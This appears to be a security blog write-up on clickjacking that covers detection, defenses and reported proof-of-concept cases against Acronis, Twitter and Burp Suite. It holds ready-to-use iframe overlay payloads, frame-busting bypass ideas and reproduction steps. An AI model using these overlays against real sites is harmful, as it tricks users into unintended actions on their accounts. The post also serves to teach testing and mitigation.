Day 15 of 30 Days — 30 Vulnerabilities | ClickJacking

Day 15: Mastering ClickJacking Vulnerability — Essential Tricks & Techniques Based on Personal Experience and Valuable POCs

[ In collaboration with Abhijeet Kumawat ( his LinkedIn | Twitter)]

Hey geeks, it4chis3c (Twitter) here with one more write-up on tricks & tips to detect ClickJacking Vulnerability.

1. Brief Description

• Definition: Clickjacking is a malicious technique where a user is tricked into clicking on something different from what the user perceives, potentially revealing confidential information or taking control of their computer.
• Core Concept: The attacker overlays a transparent or opaque iframe over a legitimate web page, misleading users into interacting with elements of the hidden content.
• Impact: This can lead to unauthorized actions like changing settings, purchasing items, or divulging sensitive information.

2. Where to Detect

• High-risk Pages:
• Login Pages: Especially where sensitive user credentials are inputted.
• Payment Pages: Particularly where financial transactions occur.
• Settings/Account Management: Areas where users can alter critical settings or account details.
• Common Targets:
• Social Media Platforms: To manipulate likes, shares, or posts.
• E-commerce Sites: To trick users into buying or adding items to their cart.
• Banking Websites: For financial gain or unauthorized transactions.

3. How to Detect

• Manual Testing:
• Frame Detection: Inspect the source code to see if pages are allowed to be embedded in iframes.
• Interaction Observation: Click on suspicious areas and observe if unexpected actions occur.
• Visual Cues: Look for areas where the cursor changes unexpectedly, indicating hidden content.
• Automated Tools:
• X-Frame-Options Header: Use tools to check for the absence of the X-Frame-Options header.
• Content Security Policy (CSP): Verify if the site implements a CSP that blocks framing.
• Burp Suite & OWASP ZAP: Utilize plugins or extensions in these tools to scan for clickjacking vulnerabilities.

4. Basic & Advanced Payloads

Basic Payloads:

• Standard Iframe:

<iframe src="https://victim.com" style="opacity:0; position:absolute; top:0; left:0; width:100%; height:100%;"></iframe>

• Hidden Button:

<button style="opacity:0; position:absolute; top:0; left:0;">Click Me!</button>

Advanced Payloads:

• Nested Iframes:

<iframe src="https://attackersite.com">
  <iframe src="https://victim.com" style="opacity:0; position:absolute; top:0; left:0; width:100%; height:100%;"></iframe>
</iframe>

• JavaScript-based Clickjacking

document.body.innerHTML += '<iframe src="https://victim.com" style="opacity:0; position:absolute; top:0; left:0; width:100%; height:100%;"></iframe>';

5. Defense Bypass Techniques

• Clickjacking using JavaScript:
• Overlay Deception: Create an overlay with a legitimate appearance while embedding the malicious iframe below.
• Script-based Click Execution: Utilize scripts to trigger clicks on hidden elements without user awareness.
• Advanced Framing Techniques:
• Frame Busting Circumvention: Implement logic to bypass frame busting scripts (e.g., disabling window.top.location redirection).
• UI Redressing: Modify the visual presentation of the page to mislead the user into interacting with hidden elements.

6. POC (Proof of Concept)

POC 1: Clickjacking on cas.acronis.com Login Page

A. Description:

• A clickjacking attack was demonstrated on the login page of cas.acronis.com. The attack leveraged an iframe to overlay the login page with a transparent layer, tricking the user into performing unintended actions.

B. Steps to Reproduce:

• Create a new HTML file with the following source code:

<!DOCTYPE HTML>
<html lang="en-US">
<head>
<meta charset="UTF-8">
<title>I Frame</title>
</head>
<body>
<h2>Clickjacking Vulnerability</h2>
<iframe src="https://cas.acronis.com/" frameborder="0" height="700px" width="850px"></iframe>
</body>
</html>.+

• Save the file as whatever.html.
• Open the document in a browser.

C. Impact:

• The attacker may trick the user into clicking on an image, leading to their account being unconsciously deactivated.

D. Fix:

• The vulnerability can be mitigated by adding frame-ancestors 'self'; to the CSP (Content-Security-Policy) header.

POC 2: Twitter Periscope Clickjacking Vulnerability

A. Description:

• Clickjacking was possible on the Twitter Periscope subdomain due to inadequate support for the X-Frame-Options ALLOW-FROM header across several browsers.

B. Steps to Reproduce:

• Create a new HTML file and include the following code:

<iframe src="https://vulnerable.site" frameborder="0"></iframe>

• Save the file.
• Open the document in a browser.

C. Impact:

• The attacker may trick the user into clicking on an image, leading to their account being unconsciously deactivated.

Solution:

• Adding frame-ancestors 'self'; to the CSP header can mitigate the vulnerability.

POC 3: RCE of Burp Scanner/Crawler via Clickjacking

A. Description:

• A combination of clickjacking and XSS vulnerabilities was used to execute Remote Code Execution (RCE) on the Burp Suite scanner/crawler.

B. Steps to Reproduce:

• Download the attached ‘burp.html’ exploit, and host it on a web server (e.g., python -m http.server).
• Launch an instance of Burp Suite and start a new scan of the web server.
• Open a Chrome browser and navigate to the hosted exploit page (e.g., http://127.0.0.1:8000/burp.html).
• Observe that a JavaScript port scanner identifies the port listening for Chrome remote debugging. A clickjacking payload is then rendered.
• Click the ‘CLICK ME!!!’ button, restart Burp Suite, and observe that the Calculator app has been launched.

C. Impact:

• Successful exploitation allows an attacker to gain control over the victim’s computer with the same permissions as the user running the scanner.

POC 4: Highly Wormable Clickjacking in Player Card

A. Description:

• The Player Card on Twitter was vulnerable to clickjacking, allowing attackers to perform click-based critical actions such as retweets and follows without user consent.

B. Steps to Reproduce:

• Clone the Player Card starter bundle from GitHub.
• Change the card’s property twitter:player to a custom HTML file.
• In the HTML file, embed an iframe to a Twitter page (e.g., <iframe src="//twitter.com"></iframe>).
• Post the link in a Tweet (ensure the domain is white-listed).
• Expand the tweet in Safari or IE; it will show that a Twitter page is embedded.

C. Impact:

• The attack can be wormable, allowing the attacker to make victims tweet arbitrary content, perform click-based critical actions, and spread the attack.

7. Conclusion

Summary: Clickjacking is a critical security vulnerability that exploits the user’s trust and can lead to severe consequences if not properly mitigated.

Preventative Measures:

• X-Frame-Options Header: Always implement the X-Frame-Options header to restrict framing of your website.
• Content Security Policy (CSP): Use a well-defined CSP to prevent unauthorized framing.
• Regular Security Audits: Conduct regular security assessments to identify and fix potential vulnerabilities.

Final Thoughts: By understanding the methods and implementing the proper defenses, web developers can protect their users and applications from clickjacking attacks.

…………………………………………………………………………………………………

Thank you for reading the blog!!!

You can also follow me on Twitter & LinkedIn for more write-ups

Follow & subscribe for daily write-up updates via mail on Medium

Stay tuned for Day 16, where we’ll dive into another vulnerability!

…………………………………………………………………………………………………